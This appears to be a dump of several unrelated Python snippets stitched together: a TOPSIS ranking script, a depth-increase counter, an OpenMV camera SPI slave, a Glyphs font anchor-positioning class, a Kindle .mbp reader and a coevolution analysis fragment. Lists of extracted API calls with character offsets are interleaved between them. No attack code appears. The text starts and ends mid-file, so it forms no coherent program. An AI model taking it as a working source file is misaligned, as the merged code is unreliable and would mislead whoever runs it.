f"Error: Incorrect number of weights! Pass only {len(df.columns)-1} weights\nMake sure weights are separated by ',' (comma)")
impacts = sys.argv[3].split(',')
if len(impacts) != len(df.columns)-1:
sys.exit(
f"Error: Incorrect number of impacts! Pass only {len(df.columns)-1} impacts\nMake sure impacts are separated by ',' (comma)")
if any(i not in ['+', '-'] for i in impacts):
sys.exit("Error: Impacts must be either '+' or '-'")
impacts = list(map(lambda x: 1 if x == '+' else -1, impacts))
if sys.argv[4][-4:] != '.csv':
sys.exit("Error: Output file must contain .csv extension")
sumOfSquares = df.iloc[:, 1:].apply(lambda x: x*x).sum().apply(lambda x: x**0.5)
sumOfSquares = sumOfSquares.to_frame().transpose()
normalized_df = df.iloc[:, 1:].divide(sumOfSquares.values)
weighted_df = normalized_df.multiply(weights)
ideal_best = weighted_df.multiply(impacts).max().apply(lambda x: abs(x)).to_frame().transpose()
ideal_worst = weighted_df.multiply(impacts).min().apply(lambda x: abs(x)).to_frame().transpose()
dist_best = weighted_df.subtract(ideal_best.values).apply(
lambda x: x**2).sum(axis=1).apply(lambda x: x**0.5)
dist_worst = weighted_df.subtract(ideal_worst.values).apply(
lambda x: x**2).sum(axis=1).apply(lambda x: x**0.5)
Pi = dist_worst/(dist_best+dist_worst)
df['TOPSIS Score'] = Pi
df['Rank'] = Pi.rank(ascending=False).astype(int)
df.to_csv(sys.argv[4], index=False)
if __name__ == '__main__':
main()
| [
"pandas.read_csv",
"sys.exit"
] | [((92, 230), 'sys.exit', 'sys.exit', (['"""Error: Incorrect Number of arguments\nDesired Syntax: topsis <inputDataFile> <weights> <impacts> <outputFileName>"""'], {}), '(\n """Error: Incorrect Number of arguments\nDesired Syntax: topsis <inputDataFile> <weights> <impacts> <outputFileName>"""\n )\n', (100, 230), False, 'import sys\n'), ((242, 266), 'pandas.read_csv', 'pd.read_csv', (['sys.argv[1]'], {}), '(sys.argv[1])\n', (253, 266), True, 'import pandas as pd\n'), ((426, 490), 'sys.exit', 'sys.exit', (['"""Error: Input file must contain three or more columns"""'], {}), "('Error: Input file must contain three or more columns')\n", (434, 490), False, 'import sys\n'), ((580, 656), 'sys.exit', 'sys.exit', (['"""Error: From 2nd to last columns must contain numeric values only"""'], {}), "('Error: From 2nd to last columns must contain numeric values only')\n", (588, 656), False, 'import sys\n'), ((706, 757), 'sys.exit', 'sys.exit', (['"""Error: Input file contains NULL values!"""'], {}), "('Error: Input file contains NULL values!')\n", (714, 757), False, 'import sys\n'), ((1419, 1471), 'sys.exit', 'sys.exit', (['"""Error: Impacts must be either \'+\' or \'-\'"""'], {}), '("Error: Impacts must be either \'+\' or \'-\'")\n', (1427, 1471), False, 'import sys\n'), ((1588, 1646), 'sys.exit', 'sys.exit', (['"""Error: Output file must contain .csv extension"""'], {}), "('Error: Output file must contain .csv extension')\n", (1596, 1646), False, 'import sys\n'), ((289, 395), 'sys.exit', 'sys.exit', (['"""Error: File not Found! Make sure the file is saved in the current working directory."""'], {}), "(\n 'Error: File not Found! Make sure the file is saved in the current working directory.'\n )\n", (297, 395), False, 'import sys\n'), ((863, 910), 'sys.exit', 'sys.exit', (['"""Error: Weights must be numeric only"""'], {}), "('Error: Weights must be numeric only')\n", (871, 910), False, 'import sys\n')] |
import pandas as pd
data = pd.read_csv(r'./input.txt', sep=',', header=None)
data.columns = ['depth']
diff_single = data.diff()
count = diff_single.loc[diff_single['depth'] > 0]
nb_increased = count.shape[0]
print(nb_increased)
# Calculate sum of window quick and dirty
data['depth_1'] = data['depth'].shift(-1)
data['depth_2'] = data['depth'].shift(-2)
data['depth_sum'] = data.sum(axis=1)
# Calculate sum of window shorter and more elegant
data['depth_sum_2'] = data['depth'].rolling(3).sum().shift(-2)
diff_sum = data.diff()
count_sum = diff_sum.loc[diff_sum['depth_sum_2'] > 0]
nb_increased_sum = count_sum.shape[0]
print(nb_increased_sum)
| [
"pandas.read_csv"
] | [((28, 76), 'pandas.read_csv', 'pd.read_csv', (['"""./input.txt"""'], {'sep': '""","""', 'header': 'None'}), "('./input.txt', sep=',', header=None)\n", (39, 76), True, 'import pandas as pd\n')] |
import image, network, rpc, sensor, struct
import time
import micropython
from pyb import Pin
from pyb import LED
red_led = LED(1)
green_led = LED(2)
blue_led = LED(3)
ir_led = LED(4)
def led_control(x):
if (x&1)==0: red_led.off()
elif (x&1)==1: red_led.on()
if (x&2)==0: green_led.off()
elif (x&2)==2: green_led.on()
if (x&4)==0: blue_led.off()
elif (x&4)==4: blue_led.on()
if (x&8)==0: ir_led.off()
elif (x&8)==8: ir_led.on()
processing = True
# pin used to sync the 2 cams
pin4 = Pin('P4', Pin.IN, Pin.PULL_UP)
# setting the SPI communication as a slave
interface = rpc.rpc_spi_slave(cs_pin="P3", clk_polarity=1, clk_phase=0)
# here we always choose the QVGA format (320x240) inside a VGA image
img_width = 320
img_height = 240
sensor.reset()
sensor_format = sensor.GRAYSCALE
sensor_size = sensor.VGA
sensor.set_pixformat(sensor_format)
sensor.set_framesize(sensor_size)
if img_width != sensor.width() or img_height != sensor.height():
sensor.set_windowing((int((sensor.width()-img_width)/2),int((sensor.height()-img_height)/2),img_width,img_height))
sensor.skip_frames(time = 2000)
sensor.snapshot()
################################################################
# Call Backs
################################################################
def sensor_config(data):
global processing
gain_db, exposure_us, r_gain_db, g_gain_db, b_gain_db = struct.unpack("<fIfff", data)
sensor.set_auto_gain(False, gain_db)
sensor.set_auto_exposure(False, exposure_us)
sensor.set_auto_whitebal(False, (r_gain_db, g_gain_db, b_gain_db))
processing = False
return struct.pack("<fIfff",gain_db, exposure_us, r_gain_db, g_gain_db, b_gain_db)
def raw_image_read_cb():
global processing
interface.put_bytes(sensor.get_fb().bytearray(), 5000) # timeout
processing = False
def raw_image_read(data):
interface.schedule_callback(raw_image_read_cb)
return bytes()
def loop_callback():
global processing
if not processing:
raise Exception
# Register call backs.
interface.register_callback(raw_image_read)
interface.register_callback(sensor_config)
interface.setup_loop_callback(loop_callback)
# a simple visual way to know the slave cam has started properly and is ready
led_control(4)
time.sleep(500)
led_control(0)
time.sleep(500)
led_control(4)
time.sleep(500)
led_control(0)
# configuration step: getting the same image settings as the controller cam
try:
processing = True
interface.loop()
except:
pass
# serve for ever
while True:
try:
processing = True
# GPIO sync
while not pin4.value():
pass
# Get a snapshot that will be sent back to the controller cam
sensor.snapshot()
interface.loop()
except:
pass
| [
"sensor.skip_frames",
"sensor.set_auto_gain",
"pyb.LED",
"sensor.set_pixformat",
"pyb.Pin",
"sensor.set_auto_whitebal",
"sensor.get_fb",
"sensor.set_framesize",
"time.sleep",
"struct.pack",
"struct.unpack",
"sensor.width",
"sensor.reset",
"sensor.height",
"sensor.set_auto_exposure",
"s... | [((128, 134), 'pyb.LED', 'LED', (['(1)'], {}), '(1)\n', (131, 134), False, 'from pyb import LED\n'), ((147, 153), 'pyb.LED', 'LED', (['(2)'], {}), '(2)\n', (150, 153), False, 'from pyb import LED\n'), ((166, 172), 'pyb.LED', 'LED', (['(3)'], {}), '(3)\n', (169, 172), False, 'from pyb import LED\n'), ((185, 191), 'pyb.LED', 'LED', (['(4)'], {}), '(4)\n', (188, 191), False, 'from pyb import LED\n'), ((534, 564), 'pyb.Pin', 'Pin', (['"""P4"""', 'Pin.IN', 'Pin.PULL_UP'], {}), "('P4', Pin.IN, Pin.PULL_UP)\n", (537, 564), False, 'from pyb import Pin\n'), ((621, 680), 'rpc.rpc_spi_slave', 'rpc.rpc_spi_slave', ([], {'cs_pin': '"""P3"""', 'clk_polarity': '(1)', 'clk_phase': '(0)'}), "(cs_pin='P3', clk_polarity=1, clk_phase=0)\n", (638, 680), False, 'import image, network, rpc, sensor, struct\n'), ((784, 798), 'sensor.reset', 'sensor.reset', ([], {}), '()\n', (796, 798), False, 'import image, network, rpc, sensor, struct\n'), ((857, 892), 'sensor.set_pixformat', 'sensor.set_pixformat', (['sensor_format'], {}), '(sensor_format)\n', (877, 892), False, 'import image, network, rpc, sensor, struct\n'), ((893, 926), 'sensor.set_framesize', 'sensor.set_framesize', (['sensor_size'], {}), '(sensor_size)\n', (913, 926), False, 'import image, network, rpc, sensor, struct\n'), ((1111, 1140), 'sensor.skip_frames', 'sensor.skip_frames', ([], {'time': '(2000)'}), '(time=2000)\n', (1129, 1140), False, 'import image, network, rpc, sensor, struct\n'), ((1143, 1160), 'sensor.snapshot', 'sensor.snapshot', ([], {}), '()\n', (1158, 1160), False, 'import image, network, rpc, sensor, struct\n'), ((2292, 2307), 'time.sleep', 'time.sleep', (['(500)'], {}), '(500)\n', (2302, 2307), False, 'import time\n'), ((2323, 2338), 'time.sleep', 'time.sleep', (['(500)'], {}), '(500)\n', (2333, 2338), False, 'import time\n'), ((2354, 2369), 'time.sleep', 'time.sleep', (['(500)'], {}), '(500)\n', (2364, 2369), False, 'import time\n'), ((1413, 1442), 'struct.unpack', 'struct.unpack', (['"""<fIfff"""', 'data'], {}), "('<fIfff', data)\n", (1426, 1442), False, 'import image, network, rpc, sensor, struct\n'), ((1447, 1483), 'sensor.set_auto_gain', 'sensor.set_auto_gain', (['(False)', 'gain_db'], {}), '(False, gain_db)\n', (1467, 1483), False, 'import image, network, rpc, sensor, struct\n'), ((1488, 1532), 'sensor.set_auto_exposure', 'sensor.set_auto_exposure', (['(False)', 'exposure_us'], {}), '(False, exposure_us)\n', (1512, 1532), False, 'import image, network, rpc, sensor, struct\n'), ((1537, 1603), 'sensor.set_auto_whitebal', 'sensor.set_auto_whitebal', (['(False)', '(r_gain_db, g_gain_db, b_gain_db)'], {}), '(False, (r_gain_db, g_gain_db, b_gain_db))\n', (1561, 1603), False, 'import image, network, rpc, sensor, struct\n'), ((1638, 1714), 'struct.pack', 'struct.pack', (['"""<fIfff"""', 'gain_db', 'exposure_us', 'r_gain_db', 'g_gain_db', 'b_gain_db'], {}), "('<fIfff', gain_db, exposure_us, r_gain_db, g_gain_db, b_gain_db)\n", (1649, 1714), False, 'import image, network, rpc, sensor, struct\n'), ((943, 957), 'sensor.width', 'sensor.width', ([], {}), '()\n', (955, 957), False, 'import image, network, rpc, sensor, struct\n'), ((975, 990), 'sensor.height', 'sensor.height', ([], {}), '()\n', (988, 990), False, 'import image, network, rpc, sensor, struct\n'), ((2741, 2758), 'sensor.snapshot', 'sensor.snapshot', ([], {}), '()\n', (2756, 2758), False, 'import image, network, rpc, sensor, struct\n'), ((1786, 1801), 'sensor.get_fb', 'sensor.get_fb', ([], {}), '()\n', (1799, 1801), False, 'import image, network, rpc, sensor, struct\n'), ((1023, 1037), 'sensor.width', 'sensor.width', ([], {}), '()\n', (1035, 1037), False, 'import image, network, rpc, sensor, struct\n'), ((1057, 1072), 'sensor.height', 'sensor.height', ([], {}), '()\n', (1070, 1072), False, 'import image, network, rpc, sensor, struct\n')] |
import math
import re
from collections import defaultdict
from GlyphsApp import Glyphs, OFFCURVE, GSLayer
from Foundation import NSPoint
class layerPositions:
def __init__(self, l, all_indic_headlines=None):
self.layer = l
self.layer_flat = l.copyDecomposedLayer()
self.layer_flat.removeOverlap()
try:
self.italic_angle = Glyphs.font.masters[self.layer.associatedMasterId].italicAngle
except AttributeError:
self.italic_angle = 0
self.is_smallcaps = l.parent.subCategory == 'Smallcaps'
self.layer_metrics = defaultdict(dict)
self.aname_sub = re.compile('^[xy]pos_')
self._leftmost_node = None
self._rightmost_node = None
self._topmost_node = None
self._bottommost_node = None
self._all_layer_nodes = None
self._top_two_nodes = None
self._bottom_two_nodes = None
self._bottom_two_nodes_consecutive = None
self._indic_headlines = all_indic_headlines or self._get_all_indic_headlines()
self._indic_stem_widths = self._get_indic_stem_widths()
def compensate_italic_angle(self, pos_y):
if not self.italic_angle:
return 0
return round(math.tan(math.radians(self.italic_angle)) * pos_y)
def all_layers_nodes(self):
if self._all_layer_nodes is None:
self._all_layer_nodes = [n for p in self.layer_flat.paths for n in p.nodes if n.type != OFFCURVE]
return self._all_layer_nodes
@staticmethod
def get_next_node(node):
next_node = node.nextNode
while next_node.type == OFFCURVE:
next_node = next_node.nextNode
return next_node
@staticmethod
def get_prev_node(node):
prev_node = node.prevNode
while prev_node.type == OFFCURVE:
prev_node = prev_node.nextNode
return prev_node
def leftmost_node(self):
if self._leftmost_node is None:
nodes = [(n.x - self.compensate_italic_angle(n.y), n.x, n.y) for n in self.all_layers_nodes()]
nodes.sort(key=lambda x: x[0])
self._leftmost_node = NSPoint(nodes[0][1], nodes[0][2])
return self._leftmost_node
def rightmost_node(self):
if self._rightmost_node is None:
nodes = [(n.x - self.compensate_italic_angle(n.y), n.x, n.y) for n in self.all_layers_nodes()]
nodes.sort(key=lambda x: x[0])
self._rightmost_node = NSPoint(nodes[-1][1], nodes[-1][2])
return self._rightmost_node
def topmost_node(self):
if self._topmost_node is None:
self._topmost_node = sorted(self.all_layers_nodes(), key=lambda x: x.y)[-1]
return self._topmost_node
def bottommost_node(self):
if self._bottommost_node is None:
self._bottommost_node = sorted(self.all_layers_nodes(), key=lambda x: x.y)[0]
return self._bottommost_node
def top_two_nodes(self):
if self._top_two_nodes is None:
self._top_two_nodes = sorted(self.all_layers_nodes(), key=lambda x: x.y, reverse=True)[:2]
self._top_two_nodes.sort(key=lambda x: x.x)
return self._top_two_nodes
def bottom_two_nodes(self):
if self._bottom_two_nodes is None:
self._bottom_two_nodes = sorted(self.all_layers_nodes(), key=lambda x: x.y)[:2]
self._bottom_two_nodes.sort(key=lambda x: x.x)
return self._bottom_two_nodes
def bottom_two_nodes_consecutive(self):
if self._bottom_two_nodes_consecutive is None:
other_node = min([self.get_next_node(self.bottommost_node()), self.get_prev_node(self.bottommost_node())], key=lambda n: n.y)
self._bottom_two_nodes_consecutive = sorted([self.bottommost_node(), other_node], key=lambda x: x.y)
self._bottom_two_nodes_consecutive.sort(key=lambda x: x.x)
return self._bottom_two_nodes_consecutive
def get_coords(self, pos_x_name, pos_y_name):
try:
if not pos_x_name.startswith('xpos'):
pos_x_name = 'xpos_' + pos_x_name
except AttributeError:
pass
try:
if not pos_y_name.startswith('ypos'):
pos_y_name = 'ypos_' + pos_y_name
except AttributeError:
pass
pos_y = 0
if type(pos_y_name) in [int, float]:
pos_y = pos_y_name
elif pos_y_name is None:
pos_y = None
else:
pos_y = self.layer_metrics.get(self.layer.layerId, {}).get(pos_y_name)
if pos_y is None:
try:
pos_y = getattr(self, pos_y_name)()
except (AttributeError, IndexError):
pass
self.layer_metrics[self.layer.layerId][pos_y_name] = pos_y
pos_x = 0
if type(pos_x_name) in [int, float]:
pos_x = self.xpos_value(pos_x_name, pos_y)
elif pos_x_name is None:
pos_x = None
else:
if not self.italic_angle:
pos_x = self.layer_metrics.get(self.layer.layerId, {}).get(pos_x_name)
else:
pos_x = None
if pos_x is None:
try:
pos_x = getattr(self, pos_x_name)(pos_y)
except (AttributeError, IndexError):
pass
self.layer_metrics[self.layer.layerId][pos_x_name] = pos_x
return pos_x, pos_y
# def _get_anchor_from_other_glyph(self, layer, aname):
# gname = self.aname_sub.sub('', pos_y_name)
# g = Glyphs.font.glyphs[gname]
# if g is not None:
# layer = g.layers[self.layer.associatedMasterId]
# _, pos_y = self._get_anchor_pos(layer, aname)
# pos_y_name += aname
# else:
# _, pos_y = self._get_anchor_pos(self.layer, pos_y_name)
def _get_anchor_pos(self, layer, aname):
aname = self.aname_sub.sub('', aname)
a = layer.anchors[aname]
if a is None:
layer = layer.copyDecomposedLayer()
a = layer.anchors[aname]
if a is None:
return 0, 0
return a.position
def _get_all_indic_headlines(self):
"""
Builds a dictionary holding the x-coordinates for the top and bottom of the headline for each master.
dict[script][master ID][top or bottom]
"""
headline_dict = {}
for gn in ['ka-beng', 'ka-deva']:
g = Glyphs.font.glyphs[gn]
if g:
headline_dict[g.script] = {}
for l in g.layers:
top, bottom = self._get_indic_headline(l)
headline_dict[g.script][l.associatedMasterId] = {
'top': top,
'bottom': bottom,
}
return headline_dict
def _get_indic_stem_widths(self):
"""
Builds a dictionary holding the stem width for each master.
dict[script][master ID] = stem width
"""
temp_dict = defaultdict(dict)
for gn in ['iMatra-beng', 'iMatra-deva']:
g = Glyphs.font.glyphs[gn]
if g:
for l in g.layers:
stem_coords = l.intersectionsBetweenPoints((0, 300), (l.width, 300), components=True)[1:-1]
try:
stem_width = stem_coords[1].x - stem_coords[0].x
temp_dict[g.script][l.associatedMasterId] = stem_width
except IndexError:
temp_dict[g.script][l.associatedMasterId] = None
return temp_dict
@staticmethod
def _get_indic_headline(layer):
"""
Calculates the top and bottom y-values for the indic headline.
"""
layer = layer.copyDecomposedLayer()
layer.removeOverlap()
all_nodes = [n for p in layer.paths for n in p.nodes if not n.type == OFFCURVE]
all_nodes.sort(key=lambda n: n.y, reverse=True)
top = None
for n in all_nodes:
if (n.nextNode.y == n.y and not n.nextNode.type == OFFCURVE) or (n.prevNode.y == n.y and not n.prevNode.type == OFFCURVE):
top = n.y
break
bottom = None
for n in all_nodes:
if ((n.nextNode.y == n.y and not n.nextNode.type == OFFCURVE) or (n.prevNode.y == n.y and not n.prevNode.type == OFFCURVE)) and n.y != top:
bottom = n.y
break
return top, bottom
@staticmethod
def _check_coord(comp_this, comp_against, fuzziness=2):
"""
Checks whether a value is within the bounds of fuzziness.
"""
return comp_against + fuzziness > comp_this > comp_against - fuzziness
def _get_indic_rightmost_stem(self, l):
stem_center = None
number_of_samples = 12
stem_width = self._indic_stem_widths.get(l.parent.script, {}).get(l.associatedMasterId)
if stem_width is None:
return
fuzziness = stem_width * 0.1
measure_interval = int(l.bounds.size.height / number_of_samples)
measure_heights = range(int(l.bounds.origin.y), int(l.bounds.origin.y + l.bounds.size.height), measure_interval)
potential_stems = defaultdict(list)
measured_points = []
# l.guides = []
for height in measure_heights:
for p in l.paths:
measure_l = GSLayer()
measure_l.width = l.width
measure_l.paths.append(p)
measured_points.append(measure_l.intersectionsBetweenPoints((0, height), (measure_l.width, height), components=True)[1:-1])
for c in l.components:
measure_l = c.componentLayer.copyDecomposedLayer()
measure_l.removeOverlap()
measure_l.applyTransform(c.transform)
measured_points.append(measure_l.intersectionsBetweenPoints((0, height), (measure_l.width + c.transform[4], height), components=True)[1:-1])
# if 1:
# ngl = GSGuideLine()
# ngl.position = NSPoint(0, height)
# ngl.setShowMeasurement_(1)
# l.guides.append(ngl)
# print(l, stem_width)
for measure_coords in measured_points:
for ci, coord in enumerate(measure_coords):
try:
next_coord = measure_coords[ci + 1]
except IndexError:
break
coord_distance = next_coord.x - coord.x
# print(coord_distance, measure_coords)
if self._check_coord(coord_distance, stem_width, fuzziness=fuzziness):
stem_mid_point = round((next_coord.x + coord.x) / 2)
stem_mid_point_max = stem_mid_point + fuzziness
stem_mid_point_min = stem_mid_point - fuzziness
added = False
for min_max in potential_stems.keys():
pmin, pmax = min_max
if pmax > stem_mid_point_max > pmin or pmax > stem_mid_point_min > pmin:
potential_stems[min_max].append(stem_mid_point)
added = True
break
if not added:
potential_stems[(stem_mid_point_min, stem_mid_point_max)].append(stem_mid_point)
vals = potential_stems.values()
vals.sort(reverse=True)
vals.sort(key=len, reverse=True)
stem_center = round(sum(vals[0]) / len(vals[0]))
return stem_center
# X positions
# The below methods calculate x-coordinate positions.
# If the font is italic, the x position needs to be adjusted (the y position is unaffected by italic).
def xpos_stem_top_center(self, pos_y):
"""
Finds the 2 highest nodes and returns the x position between them
"""
x_pos = sum([x.x for x in self.top_two_nodes()]) / 2
if self.italic_angle:
measure_node = sum([x.y for x in self.top_two_nodes()]) / 2
x_pos += self.compensate_italic_angle(pos_y - measure_node)
return int(x_pos)
def xpos_stem_top_left(self, pos_y):
"""
Finds the 2 highest nodes and returns the x position of the leftmost one.
"""
x_pos = int(self.top_two_nodes()[0].x)
if self.italic_angle:
measure_node = self.top_two_nodes()[0]
x_pos += self.compensate_italic_angle(pos_y - measure_node.y)
return x_pos
def xpos_stem_top_right(self, pos_y):
"""
Finds the 2 highest nodes and returns the x position of the rightmost one.
"""
x_pos = int(self.top_two_nodes()[-1].x)
if self.italic_angle:
measure_node = self.top_two_nodes()[-1]
x_pos += self.compensate_italic_angle(pos_y - measure_node.y)
return x_pos
def xpos_stem_bottom_center(self, pos_y):
"""
Finds the 2 lowest nodes and returns the x position between them
"""
x_pos = sum([x.x for x in self.bottom_two_nodes_consecutive()]) / 2
if self.italic_angle:
measure_node = sum([x.y for x in self.bottom_two_nodes_consecutive()]) / 2
x_pos += self.compensate_italic_angle(pos_y - measure_node)
return int(x_pos)
def xpos_stem_bottom_right(self, pos_y):
"""
Finds the 2 lowest nodes and returns the x position of the leftmost one.
"""
x_pos = int(self.bottom_two_nodes_consecutive()[-1].x)
if self.italic_angle:
measure_node = self.bottom_two_nodes_consecutive()[-1]
x_pos += self.compensate_italic_angle(pos_y - measure_node.y)
return x_pos
def xpos_stem_bottom_left(self, pos_y):
"""
Finds the 2 lowest nodes and returns the x position of the rightmost one.
"""
x_pos = int(self.bottom_two_nodes_consecutive()[0].x)
if self.italic_angle:
measure_node = self.bottom_two_nodes_consecutive()[0]
x_pos += self.compensate_italic_angle(pos_y - measure_node.y)
return x_pos
def xpos_outline_center(self, pos_y):
"""
Finds the leftmost node and rightmost node and returns the x position of their centre.
"""
# pos_x = int(sum([self.layer.bounds.origin.x, self.layer.bounds.size.width, self.layer.bounds.origin.x]) / 2)
pos_x = int((self.layer.bounds.size.width / 2) + self.layer.bounds.origin.x)
if self.italic_angle:
measure_node = ((self.leftmost_node().x + self.rightmost_node().x) / 2, (self.leftmost_node().y + self.rightmost_node().y) / 2)
italic_compensation = self.compensate_italic_angle(pos_y - measure_node[1])
pos_x = measure_node[0] + italic_compensation
return int(pos_x)
def xpos_outline_left(self, pos_y):
"""
Returns the x position of the leftmost node.
"""
pos_x = self.layer.bounds.origin.x
if self.italic_angle:
measure_node = self.leftmost_node()
italic_compensation = self.compensate_italic_angle(pos_y - measure_node.y)
pos_x = measure_node.x + italic_compensation
return int(pos_x)
def xpos_outline_right(self, pos_y):
"""
Returns the x position of the rightmost node.
"""
pos_x = self.layer.bounds.size.width + self.layer.bounds.origin.x
if self.italic_angle:
measure_node = self.rightmost_node()
italic_compensation = self.compensate_italic_angle(pos_y - measure_node.y)
pos_x = measure_node.x + italic_compensation
return int(pos_x)
def xpos_LSB(self, pos_y):
"""
Returns the x position of the left sidebearing.
In upright fonts, this will always be 0.
"""
pos_x = 0
if self.italic_angle:
pos_x = self.compensate_italic_angle(pos_y - (self.ypos_xHeight() / 2))
return int(pos_x)
def xpos_RSB(self, pos_y):
"""
Returns the x position of the right sidebearing.
"""
pos_x = self.layer.width
if self.italic_angle:
pos_x = self.compensate_italic_angle(pos_y - (self.ypos_xHeight() / 2))
return int(pos_x)
def xpos_apex_top(self, pos_y):
"""
Returns the x position of the highest node.
"""
pos_x = self.topmost_node().x
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y - self.topmost_node().y)
return int(pos_x)
def xpos_apex_bottom(self, pos_y):
"""
Returns the x position of the lowest node.
"""
pos_x = self.bottommost_node().x
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y - self.bottommost_node().y)
return int(pos_x)
def xpos_width_75(self, pos_y):
"""
Returns 75% of the advance width.
"""
pos_x = self.layer.width * 0.75
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y)
return int(pos_x)
def xpos_width_60(self, pos_y):
"""
Returns 50% of the advance width.
"""
pos_x = self.layer.width * 0.60
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y)
return int(pos_x)
def xpos_width_50(self, pos_y):
"""
Returns 50% of the advance width.
"""
pos_x = self.layer.width * 0.50
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y)
return int(pos_x)
def xpos_width_25(self, pos_y):
"""
Returns 25% of the advance width.
"""
pos_x = self.layer.width * 0.25
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y)
return int(pos_x)
def xpos_width_33(self, pos_y):
"""
Returns 25% of the advance width.
"""
pos_x = self.layer.width * 0.33
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y)
return int(pos_x)
def xpos_width_66(self, pos_y):
"""
Returns 25% of the advance width.
"""
pos_x = self.layer.width * 0.66
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y)
return int(pos_x)
def xpos_indic_right_stem(self, pos_y):
stem_center = self._get_indic_rightmost_stem(self.layer)
if stem_center is None:
stem_center = self.xpos_width_50(self.ypos_indic_headline_top())
return stem_center
def xpos_value(self, pos_x, pos_y):
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y)
return int(pos_x)
# Y positions
# The below methods calculate key y-coordinate positions.
def ypos_xHeight(self):
"""
Returns the xheight as defined in the Master's font info panel.
"""
return Glyphs.font.masters[self.layer.associatedMasterId].xHeight
def ypos_ascender(self):
"""
Returns the ascender as defined in the Master's font info panel.
"""
return Glyphs.font.masters[self.layer.associatedMasterId].ascender
def ypos_capHeight(self):
"""
Returns the capHeight as defined in the Master's font info panel.
"""
return Glyphs.font.masters[self.layer.associatedMasterId].capHeight
def ypos_descender(self):
"""
Returns the descender as defined in the Master's font info panel.
"""
return Glyphs.font.masters[self.layer.associatedMasterId].descender
def ypos_descender_half(self):
"""
Returns the mid point between the baseline and the descender, as defined in the Master's font info panel.
"""
return int(sum((self.ypos_descender(), self.ypos_base_line())) / 2)
def ypos_base_line(self):
"""
Returns 0, duh.
"""
return 0
def ypos_outline_top(self):
"""
Returns the y position of the hightest node.
"""
return self.layer.bounds.size.height + self.layer.bounds.origin.y
def ypos_outline_middle(self):
"""
Finds the highest and lowest nodes and returns the y position of their vertical centre.
"""
return int((self.layer.bounds.size.height / 2) + self.layer.bounds.origin.y)
def ypos_outline_bottom(self):
"""
Returns the y position of the lowest node.
"""
return self.layer.bounds.origin.y
def ypos_smallcapHeight(self):
test_g = Glyphs.font.glyphs['h.sc']
if test_g:
return test_g.layers[self.layer.associatedMasterId].bounds.size.height
else:
return self.ypos_xHeight()
def ypos_height_25(self):
"""
Returns 25% of total outline height.
"""
return int(self.layer.bounds.size.height * 0.25)
def ypos_height_50(self):
"""
Returns 50% of total outline height.
"""
return int(self.layer.bounds.size.height * 0.5)
def ypos_height_75(self):
"""
Returns 75% of total outline height.
"""
return int(self.layer.bounds.size.height * 0.75)
def ypos_indic_headline_top(self):
try:
pos_y = self._indic_headlines[self.layer.parent.script][self.layer.associatedMasterId]['top']
except KeyError:
pos_y = self.ypos_xHeight()
return pos_y
| [
"re.compile",
"Foundation.NSPoint",
"math.radians",
"GlyphsApp.GSLayer",
"collections.defaultdict"
] | [((596, 613), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (607, 613), False, 'from collections import defaultdict\n'), ((639, 662), 're.compile', 're.compile', (['"""^[xy]pos_"""'], {}), "('^[xy]pos_')\n", (649, 662), False, 'import re\n'), ((7105, 7122), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (7116, 7122), False, 'from collections import defaultdict\n'), ((9332, 9349), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (9343, 9349), False, 'from collections import defaultdict\n'), ((2151, 2184), 'Foundation.NSPoint', 'NSPoint', (['nodes[0][1]', 'nodes[0][2]'], {}), '(nodes[0][1], nodes[0][2])\n', (2158, 2184), False, 'from Foundation import NSPoint\n'), ((2477, 2512), 'Foundation.NSPoint', 'NSPoint', (['nodes[-1][1]', 'nodes[-1][2]'], {}), '(nodes[-1][1], nodes[-1][2])\n', (2484, 2512), False, 'from Foundation import NSPoint\n'), ((9500, 9509), 'GlyphsApp.GSLayer', 'GSLayer', ([], {}), '()\n', (9507, 9509), False, 'from GlyphsApp import Glyphs, OFFCURVE, GSLayer\n'), ((1249, 1280), 'math.radians', 'math.radians', (['self.italic_angle'], {}), '(self.italic_angle)\n', (1261, 1280), False, 'import math\n')] |
#
# http://www.angelfire.com/ego2/idleloop/archives/mbp_file_format.txt
#
# FMT = '>4sIiIIIiIiBBBBiiiiII'
FMT = '>4sIiH2BIIiI8B4i2I'
TYPES = ('DATA', 'BKMK', 'PUBL', 'COVE', 'CATE', 'ABST',
'GENR', 'TITL', 'AUTH')
TAGS = ('EBAR', 'EBVS', 'ADQM')
import glob
import struct
from . import palm
for f in (glob.glob("/media/Kindle/documents/*.mbp")):
db = palm.Database(f)
#print struct.unpack(FMT, db.records[0].data)
print("\n\n%s" % f)
for rec in db.records:
print("\nrecord %d" % rec.uid)
t = rec.data[:4]
(l,) = struct.unpack(">I", rec.data[4:8])
print(("%s %d" % (t, l)))
if len(rec.data) < 9:
continue
tag = rec.data[8:12]
if tag in TAGS:
if tag == 'EBAR':
print('EBAR: %d+%d' % (struct.unpack(">II", rec.data[12:20])))
else:
print(tag)
elif t == 'DATA':
try:
print(rec.data[8:].decode('utf-16be'))
except:
print(repr(rec.data))
| [
"struct.unpack",
"glob.glob"
] | [((313, 355), 'glob.glob', 'glob.glob', (['"""/media/Kindle/documents/*.mbp"""'], {}), "('/media/Kindle/documents/*.mbp')\n", (322, 355), False, 'import glob\n'), ((564, 598), 'struct.unpack', 'struct.unpack', (['""">I"""', 'rec.data[4:8]'], {}), "('>I', rec.data[4:8])\n", (577, 598), False, 'import struct\n'), ((806, 843), 'struct.unpack', 'struct.unpack', (['""">II"""', 'rec.data[12:20]'], {}), "('>II', rec.data[12:20])\n", (819, 843), False, 'import struct\n')] |
#!/bin/python
#sca_test.py
import matplotlib.pyplot as plt
import coevo2 as ce
import itertools as it
import numpy as np
import copy
import time
reload(ce)
names = ['glgA', 'glgC', 'cydA', 'cydB']
algPath = 'TestSet/eggNOG_aligns/slice_0.9/'
prots = ce.prots_from_scratch(names,path2alg=algPath)
ps = ce.ProtSet(prots,names)
phylo_names = ['aspS','ffh','lepA','pgk','recN','rho','rpoA','ruvB','tig','uvrB']
